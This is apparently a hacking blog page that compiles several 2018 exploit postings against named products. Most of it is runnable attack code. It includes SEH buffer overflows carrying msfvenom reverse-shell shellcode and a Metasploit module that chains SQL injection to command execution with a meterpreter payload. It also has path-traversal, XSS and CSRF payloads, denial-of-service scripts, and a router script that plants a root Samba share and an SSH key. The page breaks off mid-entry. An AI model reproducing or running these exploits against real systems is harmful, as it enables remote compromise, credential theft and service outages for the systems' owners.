# Exploit Title: Nagios Core Multiple Local Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1
qh_core, qh_help, and qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
1. [CVE-2018-13458] qh_core
$ echo -ne “#core\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@core\0" | socat unix-connect:./poc/nagios.qh -
2. [CVE-2018-13457] qh_echo
$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh -
3. [CVE-2018-13441] qh_help
$ echo -ne “#help\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@help\0" | socat unix-connect:./poc/nagios.qh -
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863572723
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/lanstate/download.shtml
# Version 8.8
# Tested on: Windows 7 SP 1 x86
# Open LANState, File -> Open, browse to generated lsm file, boom shell.
# If it doesn't work first try, close the tab at the bottom and reopen the file
#!/usr/bin/python
lsm = """[VERSION INFO]
PROG_NAME=LANState
PROG_VER=8.85
MAP_VER=8.3
MAPID=584636991
[OBJECT#4]
index=4
ObjName=
ObjCaption={0}
ObjHint=
ObjLink=
POS_X=100
POS_Y=0
Width=65
Height=65
ImageWidth=31
ImageHeight=32
StdImageIndex=1
ImageFilePath=
FontName=Arial
FontColor=0
FontSize=8
FontCharset=1
FontStyle=0
TextAlignment=2
TextLayout=0
ObjType=1
OBJ_ID=1
TYPE_ID=2
IP=
REMOTE_NAME=A
MAP_NAME=
MAC_ADDR=
OS=
SNMPAgent=0
SNMPVer=1
SNMPUname=
SNMPPassw=
SNMPPrivPassw=
SNMPSecLevel=0
SNMPAuthType=0
SNMPPrivType=0
Community=
ALWAYS_ON=0
ImageEnabled=0
ImageFile=
IPList=
CurrentUser=
DESCRIPT=
CheckInterval=60
DownTime1=0
DownTime1Start=12:00:00 AM
DownTime1Finish=12:00:00 AM
DownTime2=0
DownTime2Start=12:00:00 AM
DownTime2Finish=12:00:00 AM
DownTime3=0
DownTime3Start=12:00:00 AM
DownTime3Finish=12:00:00 AM
DownTime4=0
DownTime4Start=12:00:00 AM
DownTime4Finish=12:00:00 AM
DownTime5=0
DownTime5Start=12:00:00 AM
DownTime5Finish=12:00:00 AM
DownTime6=0
DownTime6Start=12:00:00 AM
DownTime6Finish=12:00:00 AM
DownTime7=0
DownTime7Start=12:00:00 AM
DownTime7Finish=12:00:00 AM
DTDoNotAlert=1
RunFirstOnly=0
FirstIsPassed=1
CHECK#0/HostAddr={0}
CHECK#0/CID=1
CHECK#0/NumRetries=1
CHECK#0/RetInterval=30
CHECK#0/IsMainCheck=0
CHECK#0/KeepStat=1
CHECK#0/CheckType=0
CHECK#0/CheckOn=1
CHECK#0/CheckRTTime=0
CHECK#0/RTTime=1000
CHECK#0/PacketsCount=4
CHECK#0/TimeOut=500
CHECK#0/SizeBuf=32
[VIEW]
FonImage=0
FonImageFile=
ImagePosition=0
ImageOffsetX=16
ImageOffsetY=16
ImgW=0
ImgH=0
ImgAutoSize=1
ScaleFactor=1
ScrollX=0
ScrollY=0
BkGroundColor=16777215
FontName=Arial
FontColor=-16777208
FontSize=8
FontCharset=1
FontStyle=0
Gradient=0
Color1=15780518
Color2=16777215
WebUseSmallIcons=0
CurIconSize=32
LockAreas=0
LockLines=0
LockHosts=0
WindowState=2
WindowTop=-10
WindowsLeft=12
WindowWidth=800
WindowsHeight=600
"""
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
shellcode = ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70"
shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61"
shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b"
shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b"
shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46"
shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c"
shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d"
shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77"
shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c"
shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68"
shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70"
shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63"
shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51"
shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f"
shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75"
shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d"
shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78"
shellcode += "\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c"
shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63"
shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69"
shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71"
shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f"
shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30"
shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34"
shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f"
shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30"
shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69"
shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70"
shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30"
shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50"
shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48"
shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42"
shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a"
shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75"
shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50"
shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55"
shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36"
shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44"
shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47"
shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76"
shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74"
shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54"
shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70"
shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e"
shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79"
shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79"
shellcode += "\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70"
shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f"
shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66"
shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f"
shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70"
shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77"
shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63"
shellcode += "\x79\x6f\x6e\x35\x41\x41"
align_stack = '\x58' # POP EAX
align_stack += '\x58' # POP EAX
align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561
align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561
align_stack += '\x05\x62\x56\x55\x55' # ADD EAX,55555662
align_stack += '\x50' # PUSH EAX
align_stack += '\x5f' # POP EDI
# JMP always true
nseh = '\x71\x06\x70\x04'
#01BA7647 POP POP RET LANState.exe
seh = '\x47\x76\xba\x01'
payload = '\x41' * 235
payload += nseh
payload += seh
payload += align_stack
payload += '\x41' * 265
payload += shellcode
payload += '\x41' * (3492 -len(shellcode + align_stack))
buffer = lsm.format(payload)
file = open('sploit.lsm','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(buffer)
file.close()
print "Map file created!"
# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml
# Run script, open up generated txt file and copy to clipboard
# Open Bandwith Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell.
# Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell.
#!/usr/bin/python
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b '\x00\x0a\x0d' -f python -v shellcode
shellcode = ""
shellcode += "\xbb\x03\xe2\x9b\xb7\xda\xc3\xd9\x74\x24\xf4\x5e"
shellcode += "\x29\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\x5d"
shellcode += "\xec\x79\x42\x9d\x18\xff\xad\x5d\xd9\x60\x27\xb8"
shellcode += "\xe8\xa0\x53\xc9\x5b\x11\x17\x9f\x57\xda\x75\x0b"
shellcode += "\xe3\xae\x51\x3c\x44\x04\x84\x73\x55\x35\xf4\x12"
shellcode += "\xd5\x44\x29\xf4\xe4\x86\x3c\xf5\x21\xfa\xcd\xa7"
shellcode += "\xfa\x70\x63\x57\x8e\xcd\xb8\xdc\xdc\xc0\xb8\x01"
shellcode += "\x94\xe3\xe9\x94\xae\xbd\x29\x17\x62\xb6\x63\x0f"
shellcode += "\x67\xf3\x3a\xa4\x53\x8f\xbc\x6c\xaa\x70\x12\x51"
shellcode += "\x02\x83\x6a\x96\xa5\x7c\x19\xee\xd5\x01\x1a\x35"
shellcode += "\xa7\xdd\xaf\xad\x0f\x95\x08\x09\xb1\x7a\xce\xda"
shellcode += "\xbd\x37\x84\x84\xa1\xc6\x49\xbf\xde\x43\x6c\x6f"
shellcode += "\x57\x17\x4b\xab\x33\xc3\xf2\xea\x99\xa2\x0b\xec"
shellcode += "\x41\x1a\xae\x67\x6f\x4f\xc3\x2a\xf8\xbc\xee\xd4"
shellcode += "\xf8\xaa\x79\xa7\xca\x75\xd2\x2f\x67\xfd\xfc\xa8"
shellcode += "\x88\xd4\xb9\x26\x77\xd7\xb9\x6f\xbc\x83\xe9\x07"
shellcode += "\x15\xac\x61\xd7\x9a\x79\x25\x87\x34\xd2\x86\x77"
shellcode += "\xf5\x82\x6e\x9d\xfa\xfd\x8f\x9e\xd0\x95\x3a\x65"
shellcode += "\xb3\x59\x12\x4a\xc3\x32\x61\x94\xc2\x79\xec\x72"
shellcode += "\xae\x6d\xb9\x2d\x47\x17\xe0\xa5\xf6\xd8\x3e\xc0"
shellcode += "\x39\x52\xcd\x35\xf7\x93\xb8\x25\x60\x54\xf7\x17"
shellcode += "\x27\x6b\x2d\x3f\xab\xfe\xaa\xbf\xa2\xe2\x64\xe8"
shellcode += "\xe3\xd5\x7c\x7c\x1e\x4f\xd7\x62\xe3\x09\x10\x26"
shellcode += "\x38\xea\x9f\xa7\xcd\x56\x84\xb7\x0b\x56\x80\xe3"
shellcode += "\xc3\x01\x5e\x5d\xa2\xfb\x10\x37\x7c\x57\xfb\xdf"
shellcode += "\xf9\x9b\x3c\x99\x05\xf6\xca\x45\xb7\xaf\x8a\x7a"
shellcode += "\x78\x38\x1b\x03\x64\xd8\xe4\xde\x2c\xe8\xae\x42"
shellcode += "\x04\x61\x77\x17\x14\xec\x88\xc2\x5b\x09\x0b\xe6"
shellcode += "\x23\xee\x13\x83\x26\xaa\x93\x78\x5b\xa3\x71\x7e"
shellcode += "\xc8\xc4\x53"
# JMP always true
nseh = '\x71\x06\x70\x04'
# 0x01174647 POP POP RET BandMonitor.exe
seh = '\x47\x46\x17\x01'
payload = '\x41' * 4188
payload += nseh
payload += seh
payload += shellcode
payload += '\x41' * (1804 - len(shellcode))
file = open('sploit.txt','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(payload)
file.close()
print "TXT file created!"
# Exploit Title: D-Link DAP-1360 File path traversal and Cross site
scripting[reflected] can lead to Authentication Bypass easily.
# Date: 20-07-2018
# Exploit Author: r3m0t3nu11
# Contact : http://twitter.com/r3m0t3nu11
# Vendor : www.dlink.com
# Version: Hardware version: F1
Firmware version: 6.O5
# Tested on:All Platforms
1) Description
After Successfully Connected to D-Link DIR-600
Router(FirmWare Version : 2.01), Any User Can Bypass The Router's
Root password as well bypass admin panel.
D-Link DAP-1360 devices with v6.x firmware allow remote attackers to
read passwords via a errorpage paramater which lead to absolute path
traversal attack,
Its More Dangerous when your Router has a public IP with remote login
enabled.
IN MY CASE,
Tested Router IP : http://192.168.70.69/
Video POC : https://www.dropbox.com/s/tvpq2jm3jv48j3c/D-link.mov?dl=0
2) Proof of Concept
Step 1: Go to
Router Login Page : http://192.168.70.69:80
Step 2:
Add the payload to URL.
Payload:
getpage=html%2Findex.html&errorpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
Now u can get root password by reading /etc/shadow.
2- XSS
Step 1: Go to
Router Login Page : http://192.168.70.69:80
Step 2:
Add the payload to URL.
Payload:
getpage=html%2Findex.html&errorpage=<Script>alert('r3m0t3nu11')</script>&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
u will get r3m0t3nu11 name pop up as reflected xss
Greetz to : Samir Hadji,0n3,C0ld Z3r0,alm3refh group,0x30 team,zero way team.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution",
'Description' => %q{
This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.
An unauthenticated user can execute a terminal command under the context of the web user.
One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
to access this endpoint without having a valid session.
Combining these vulnerabilities gives the opportunity execute operation system commands under the context
of the web user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
['CVE', '2018-12464'],
['CVE', '2018-12465'],
['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
],
'DefaultOptions' =>
{
'Payload' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Jun 19 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)
end
def execute_query(query)
#
# We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques
# but since we are able to use stacked-query approach, following form of payload is required in order to be able
# get back the output of query !
#
r = rand_text_alphanumeric(3 + rand(3))
sql = r
sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
sql << query
sql << "; -- "
sql << r
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
'vars_post' => {
'appkey' => r
}
)
end
def something_went_wrong
fail_with Failure::Unknown, 'Something went wrong'
end
def check
r = rand_text_numeric(15..35)
res = execute_query("SELECT #{r}")
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200 && res.body.include?(r)
return CheckCode::Safe
end
CheckCode::Vulnerable
end
def implant_payload(cookie)
print_status('Creating a domain record with a malformed DKIM data')
p = [
{
:id => 'temp_0',
:Description => rand_text_alpha(5),
:DkimList => [
{
:Domain => "$(php -r '#{payload.encoded}')",
:Selector => '',
:TempId => 'tempDkim_1'
}
]
}
].to_json
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
'cookie' => cookie,
'vars_get' => {
'cache' => 0,
},
'vars_post' => {
'StateData' => '[{"ouid":1}]',
'SaveData' => p
}
})
if res && res.code == 200 && res.body.include?('DbNodeId')
# Defining as global variable since we need to access them later within clean up function.
begin
@domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
@dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
rescue => e
fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
end
print_good('Payload is successfully implanted')
else
something_went_wrong
end
end
def create_user
# We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
# issue location where requires a valid session !
print_status('Creating a user with appropriate privileges')
# Defining as global variable since we need to access them later within clean up function.
@username = rand_text_alpha_lower(5..25)
@userid = rand_text_numeric(6..8)
query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
execute_query(query)
res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
if res && res.code == 200 && res.body.include?(@username)
print_good("User successfully created. Username : #{@username}")
else
something_went_wrong
end
end
def login
print_status("Authenticating with created user")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'),
'vars_post' => {
'username' => @username,
'password' => rand_text_alpha_lower(5..25),
'passwordmandatory' => rand_text_alpha_lower(5..25),
'LimitInterfaceId' => 1
}
)
if res && res.code == 200 && res.body.include?('/ui/default/index.php')
print_good('Successfully authenticated')
cookie = res.get_cookies
else
something_went_wrong
end
cookie
end
def exploit
unless check == CheckCode::Vulnerable
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
create_user
cookie = login
implant_payload(cookie)
print_status('Triggering an implanted payload')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
'cookie' => cookie,
'vars_get' => {
'cache' => 0,
},
'vars_post' => {
'DkimRecordId' => @dkimid
}
})
end
def on_new_session(session)
print_status('Cleaning up...')
cmd = ""
cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "'
cmd << "DELETE FROM account WHERE loginname ='#{@username}';"
cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};"
cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};"
cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};"
cmd << '"'
session.shell_command_token(cmd)
end
end
# Exploit Title: Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
# Date: 2018-07-25
# Software Link: [https://world.trivum-shop.de](https://world.trivum-shop.de/)
# https://world.trivum-shop.de/# Version: < 9.34 build 13381 - 12.07.18
# Category: hardware, webapps
# Tested on: V8.76 - SNR 8604.26 - C4 Professional
# Exploit Author: vulnc0d3c
# CVE: CVE-2018-13859
# 1. Description
# MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18,
# allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request
# to the end-point "?id=0&attr=protectAccess&newValue=0"
# (successful attack will allow attackers to login without authorization).
# 2. Proof of Concept
# GET Request
http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
# Exploit Title: GetGo Download Manager 6.2.1.3200 - Buffer Overflow (Denial of Service)
# Date: 2018-07-25
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co
# CVE: CVE-2017-17849
# Tested On: Windows 7 x86, Windows 10 x64
#
# Details
#
# The downloader feature of GetGo Download Manager is vulnerable
# to a buffer overflow which can cause a denial of service.
# To test the proof of concept, have it executed in your machine
# and let the GetGo application download 'index.html' from your
# given IP.
#
# SEH details (Windows 7 x86):
#
# SEH chain of thread 00000644, item 1
# Address=0863E2C8
# SE handler=68463967 <-> 4108 offset
#
# SEH chain of thread 00000644, item 2
# Address=46386746 <-> 4104 offset
# SE handler=*** CORRUPT ENTRY ***
import socket
server_ip = "0.0.0.0"
server_port = 80
payload = "A" * 4104 + "BBBB" + "\xcc\xcc\xcc\xcc" + "D" * 11000 + "\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
print "Currently listening at " + server_ip + ":" + str(server_port)
client, (client_host, client_port) = sock.accept()
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
client.send(payload)
print "Sent payload"
client.close()
sock.close()
# Exploit Title: Core FTP 2.0 - 'XRMD' Denial of Service (PoC)
# Date: 2018-07-24
# Exploit Author: Erik David Martin
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/server/download/CoreFTPServer.exe
# Version: Version 2.0, build 653, 32-bit
# Tested on: Windows XP Professional, Version 2002, Service Pack 3
# CVE: N/A
# Proof of concept:
# Create a new domain and set IP address
# Use the default certificate by Core FTP Server
# Set base directory
# Create an anonymous user (anonymous:anonymous) for example
# Set a path for the user
# Start the server
# Run exploit: python exploit.py *target ip* anonymous anonymous
# Watch the server crash...
# The exploit will work for any user, and not just anonymous
import sys
import socket
try:
host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
except:
print("Usage: exploit.py *target ip* *username* *password*")
sys.exit()
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #
mysocket.settimeout(2)
try:
mysocket.connect((host,21))
mysocket.recv(1024)
print("\n[+] Connected\n")
except:
print("[-] Error! Could not connect to target")
sys.exit()
junk = ("asO8M.lFX[Gq<4<p(.P5eMLv]\2!G8jB_6Gx[I;I!aYa#oAi@kI<f.QFwkSBiQ,!")
try:
mysocket.send("USER " + username + "\r\n")
mysocket.recv(1024)
mysocket.send("PASS " + password + "\r\n")
mysocket.recv(1024)
print("[+] Logged in as " + username)
except:
print("[-] Error! Could not log in as " + username)
sys.exit()
print("[+] Sending malicious request")
while True:
try:
mysocket.send("XRMD " + junk + "\r\n")
mysocket.recv(1024)
except:
print("[+] Target is down\n")
sys.exit()
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12
# CVE: NA
# Category: Web Application
# 1. Description
# The application allows malicious HTTP requests to be sent in order to
# trick a user into adding/ deleting web pages.
# 2. Proof of Concept
1. Visit the application
2. Go to add page option
3. Create a crafted HTTP page with delete/ add option and host it on
a server. Upon sending the link to a user and upon click, it gets triggered
and the page is added/deleted
4. Payload:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
<input type="hidden" name="_redirect" value="site/subpages" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
#!/usr/bin/python
import json
import sys
import subprocess
import socket
import os
from websocket import create_connection
def ubusAuth(host, username, password):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":["00000000000000000000000000000000","session","login",
{"username": username,"password":password}],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
key = response.get('result')[1].get('ubus_rpc_session')
except IndexError:
return(None)
return(key)
def ubusCall(host, key, namespace, argument, params={}):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":[key,namespace,argument,params],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
result = response.get('result')[1]
except IndexError:
if response.get('result')[0] == 0:
return(True)
return(None)
return(result)
if __name__ == "__main__":
host = "192.168.1.1"
sshkey = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ=="
user = "user"
pasw = "user"
conf = """[global]
netbios name = IntenoSMB
workgroup = IntenoSMB
server string = IntenoSMB
syslog = 10
encrypt passwords = true
passdb backend = smbpasswd
obey pam restrictions = yes
socket options = TCP_NODELAY
unix charset = UTF-8
preferred master = yes
os level = 20
security = user
guest account = root
smb passwd file = /etc/samba/smbpasswd
interfaces = 192.168.1.1/24 br-lan
bind interfaces only = yes
wide links = no
[pwn]
path = /
read only = no
guest ok = yes
create mask = 0700
directory mask = 0700
force user = root
"""
print("Authenticating...")
key = ubusAuth(host, user, pasw)
if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)
print("Dropping evil Samba config...")
ltc = ubusCall(host, key, "file", "write_tmp",
{"path":"/tmp/etc/smb.conf", "data": conf})
if (not ltc):
print("Failed to write evil config!")
sys.exit(1)
print("Creating temp file for key...")
with open(".key.tmp","a+") as file:
file.write(sshkey)
path = os.path.realpath(file.name)
print("Dropping key...")
subprocess.run("smbclient {0}pwn -U% -c 'put {1} /etc/dropbear/authorized_keys'".format(r"\\\\" + host + r"\\", path),
shell=True, check=True)
print("Key dropped")
print("Cleaning up...")
os.remove(path)
print("Exploitation complete. Try \"ssh root@%s\"" % host)
# Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)
# Discovery by: Luis Martínez
# Discovery Date: 2018-07-26
# Vendor Homepage: https://www.netscantools.com/
# Software Link : http://download.netscantools.com/nstb250.zip
# Tested Version: 2.5
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
